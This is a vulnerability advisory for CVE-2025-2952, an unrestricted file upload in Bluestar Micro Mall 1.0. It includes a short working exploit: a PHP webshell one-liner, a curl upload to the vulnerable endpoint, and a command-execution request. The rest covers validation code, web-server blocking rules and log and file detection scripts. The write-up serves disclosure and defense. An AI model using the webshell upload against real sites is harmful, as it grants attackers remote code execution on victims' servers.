How CVE-2025-2952 Works
CVE-2025-2952 is an unrestricted file upload in Bluestar Micro Mall 1.0. The upload handler behind `/api/api.php?mod=upload&type=1` does not validate the `File` multipart parameter: neither the extension, the size nor the content is checked, so a remote attacker can upload a PHP webshell with a single crafted multipart POST request. When the upload directory sits inside the web root and the server executes PHP there, requesting the uploaded file runs the attacker's code with the web server's privileges, i.e. remote code execution (RCE).
DailyCVE Form
Platform: Bluestar Micro Mall
Version: 1.0
Vulnerability: Unrestricted File Upload
Severity: Critical
Date: 04/15/2025
What Undercode Says:
Exploitation
1. Craft Malicious File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
(single quotes matter: inside double quotes the shell would expand `$_GET` to an empty string and write a broken payload)
2. Upload via Curl
curl -X POST -F "File=@shell.php" "http://target.com/api/api.php?mod=upload&type=1"
3. Execute Commands
curl "http://target.com/uploads/shell.php?cmd=id"
Protection
1. File Validation
The `type` field in `$_FILES` is the Content-Type the client put on the multipart part, so comparing it against an allow-list proves nothing. Sniff the bytes on the server, allow-list the extension, cap the size, and store the file under a random name outside the web root (path below is an example):
$allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png']; // extension => MIME type sniffed from the bytes
$ext = strtolower(pathinfo($_FILES['File']['name'], PATHINFO_EXTENSION));
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($_FILES['File']['tmp_name']); // never read $_FILES['File']['type']
if (!isset($allowed[$ext]) || $mime !== $allowed[$ext] || $_FILES['File']['size'] > 2097152) { die("Invalid file."); }
move_uploaded_file($_FILES['File']['tmp_name'], '/var/www/private_uploads/' . bin2hex(random_bytes(16)) . '.' . $ext);
2. Disable PHP Execution
<Directory "/var/www/uploads">
    php_flag engine off
</Directory>
`php_flag` only takes effect when PHP runs as mod_php; under php-fpm it is ignored, so additionally deny access to script extensions in that directory with a FilesMatch block.
3. Restrict Upload Directory
location ~* ^/uploads/.*\.(php\d?|phtml|phar|pl|py|jsp|cgi)$ { return 403; }
Place this before the generic `location ~ \.php$ { fastcgi_pass ...; }` block: nginx takes the first matching regex location, and the PHP block would otherwise win. `location ^~ /uploads/ { deny all; }` also works, but only if nothing under /uploads/ is meant to be served directly.
4. Use .htaccess Protection
<FilesMatch "\.(php\d?|phtml|phar|pl|py|jsp|cgi)$">
    Require all denied
</FilesMatch>
(Apache 2.2: `Order deny,allow` followed by `Deny from all`.) Do not use `AddHandler cgi-script .php .pl .py .jsp` for this: AddHandler maps those extensions to an executor, which is the opposite of blocking them. Prefer putting the rule in the main server config with `AllowOverride None` for the upload directory, otherwise an uploaded .htaccess can undo it.
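The validation steps above, generalized into one server-side routine as an added example (not code from Bluestar Micro Mall or the advisory; the allow-list, size cap, sample PNG header and sample webshell are constructed here). It contrasts the header-only check that trusts the client's Content-Type with a check that sniffs magic bytes, allow-lists the final extension, refuses script extensions anywhere in the name, and returns a random server-chosen filename:

```python
import os
import secrets

# Constructed allow-list: extension -> magic bytes the content must begin with.
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
# Extensions a PHP host may execute (or that change its config). They are
# rejected anywhere in the name, so "shell.php.png" fails even though its
# final extension is on the allow-list.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
               "pl", "py", "jsp", "cgi", "sh", "htaccess"}

# Constructed sample inputs: a minimal PNG header and the advisory's webshell.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(64)
SAMPLE_WEBSHELL = b"<?php system($_GET['cmd']); ?>"


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def weak_type_check(declared_type):
    """A check that only looks at the multipart Content-Type (PHP's
    $_FILES[...]['type']). The client sets that header, so a webshell
    declared as image/png passes."""
    return declared_type in ("image/jpeg", "image/png")


def validate_upload(client_name, data, declared_type=None):
    """Server-side validation that trusts nothing the client sent.

    Returns the random filename (server-chosen extension) under which the
    bytes should be stored, outside the web root. declared_type is accepted
    only so the caller can log it; it never influences the decision.
    """
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or larger than %d bytes" % MAX_BYTES)
    # Strip directory components the client may have smuggled in (../, C:\).
    base = os.path.basename(client_name.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("missing extension")
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed: " + ext)
    if any(p in SCRIPT_EXTS for p in parts[1:-1]):
        raise UploadRejected("script extension inside name: " + base)
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match extension")
    # Defence in depth: a valid image carrying a PHP open tag is a polyglot
    # that becomes code if the server ever include()s or executes it.
    if b"<?php" in data:
        raise UploadRejected("embedded PHP open tag")
    # Never reuse the client's name: random name, canonical extension.
    stored_ext = "jpg" if ext == "jpeg" else ext
    return secrets.token_hex(16) + "." + stored_ext


def is_accepted(client_name, data, declared_type=None):
    """True if validate_upload() accepts the file, False if it rejects it."""
    try:
        validate_upload(client_name, data, declared_type)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    cases = [
        ("shell.php", SAMPLE_WEBSHELL, "image/png"),   # the advisory's payload
        ("shell.php.png", SAMPLE_PNG, "image/png"),    # double extension
        ("cute.png", SAMPLE_WEBSHELL, "image/png"),    # wrong bytes for the name
        ("poly.png", SAMPLE_PNG + SAMPLE_WEBSHELL, None),
        ("../../photo.PNG", SAMPLE_PNG, None),         # legitimate upload
    ]
    for name, data, ctype in cases:
        print("%-18s weak=%-5s strict=%s" % (name, weak_type_check(ctype),
                                            is_accepted(name, data, ctype)))
```

The returned name is what goes on disk; the original client name is kept only in a database column or log, never used in a path. Serve stored images through a handler that sets Content-Type from the allow-list rather than by exposing the directory.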
Detection
1. Log Analysis
grep "POST /api/api.php?mod=upload" /var/log/apache2/access.log
2. File Integrity Check
find /var/www/uploads -type f \( -iname '*.php*' -o -iname '*.phtml' -o -iname '*.phar' -o -name '.htaccess' \) -ls
List rather than delete: the files are evidence. Image the directory first, then move anything found to a quarantine location outside the web root. (`-name ".php"` would match only a file literally named `.php`; `*.php*` also catches `shell.php.jpg` and `x.php5`.)
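The two detection steps above (log analysis and the upload-directory scan) as one added example that is not part of the advisory or the product: it parses constructed combined-format access log lines, flags every request for a script file under /uploads/, correlates each with the same client's most recent POST to the upload endpoint, and walks a constructed temporary directory for script extensions appearing anywhere in a filename. The log lines, IPs and file names are all made up here.

```python
import os
import re
import tempfile

# Apache/nginx "combined" format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_ENDPOINT = "/api/api.php"
UPLOAD_DIR_PREFIX = "/uploads/"
# Script extensions, matched anywhere in a name so shell.php.jpg is caught.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar|pl|py|jsp|cgi|sh)(\.|$)", re.I)

# Constructed sample log: one host uploads and then calls its webshell, a
# second host probes for a webshell that is not there.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Apr/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123
203.0.113.5 - - [15/Apr/2025:10:01:09 +0000] "POST /api/api.php?mod=upload&type=1 HTTP/1.1" 200 87
203.0.113.5 - - [15/Apr/2025:10:01:15 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 61
198.51.100.7 - - [15/Apr/2025:10:02:00 +0000] "GET /uploads/avatar.png HTTP/1.1" 200 20481
198.51.100.7 - - [15/Apr/2025:10:02:30 +0000] "GET /uploads/x.php HTTP/1.1" 404 196
"""


def parse_line(line):
    """Return the captured fields as a dict, or None for lines we cannot parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_abuse(lines):
    """Return (ip, upload_timestamp_or_None, request_path, status) for every
    request to a script file under /uploads/. upload_timestamp is that
    client's most recent POST to the upload endpoint (high confidence);
    None means a script was requested with no upload seen from that IP."""
    last_upload = {}
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, query = (rec["path"].split("?", 1) + [""])[:2]
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT and "mod=upload" in query:
            last_upload[rec["ip"]] = rec["ts"]
        elif path.startswith(UPLOAD_DIR_PREFIX) and SCRIPT_EXT_RE.search(path):
            hits.append((rec["ip"], last_upload.get(rec["ip"]), rec["path"], rec["status"]))
    return hits


def find_script_files(root):
    """List files under root whose name carries a script extension anywhere,
    plus .htaccess files (which can re-enable execution). Report, don't delete."""
    found = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name == ".htaccess" or SCRIPT_EXT_RE.search(name):
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def scan_demo():
    """Build a constructed upload directory in a temp dir and return the base
    names find_script_files() flags there."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("avatar.png", "shell.php", "evil.PHP.jpg", "img.phtml",
                     ".htaccess", "notes.txt"):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(b"x")
        os.mkdir(os.path.join(root, "2025"))
        with open(os.path.join(root, "2025", "c.php5"), "wb") as fh:
            fh.write(b"x")
        return sorted(os.path.basename(p) for p in find_script_files(root))


if __name__ == "__main__":
    for hit in find_upload_abuse(SAMPLE_LOG.splitlines()):
        print("webshell request:", hit)
    print("script files in upload dir:", scan_demo())
```

A 404 on the uncorrelated probe is still worth an alert: it shows someone knows the path convention. In production, feed `find_upload_abuse()` the real access log and point `find_script_files()` at the real upload root; both only report.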
Mitigation
- Patch: Apply vendor updates.
- WAF Rules: Block suspicious uploads.
- Permissions: make the upload directory writable only by the web server user, with no execute bit on its files and, where possible, mounted noexec; the interpreter must never be allowed to run anything from it (a fully read-only directory would also stop legitimate uploads).
References
Reported By: nvd.nist.gov